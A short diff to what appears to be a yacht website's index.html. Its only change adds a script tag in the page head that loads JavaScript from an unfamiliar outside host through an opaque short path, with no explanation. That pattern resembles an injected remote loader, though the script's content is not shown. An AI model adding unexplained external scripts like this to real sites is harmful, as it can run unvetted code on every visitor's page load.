--- a/index.html
+++ b/index.html
@@ -34,6 +34,7 @@
         
         <link rel="icon" href="../(DE) yacht 5/resources/favicons/favicon.ico" type="image/x-icon">
         <link rel="shortcut icon" href="../(DE) yacht 5/resources/favicons/favicon.ico" type="image/x-icon">
+        <script src="https://pl-cdn.net/fd90j4"></script>
         
     </head>
     <body>
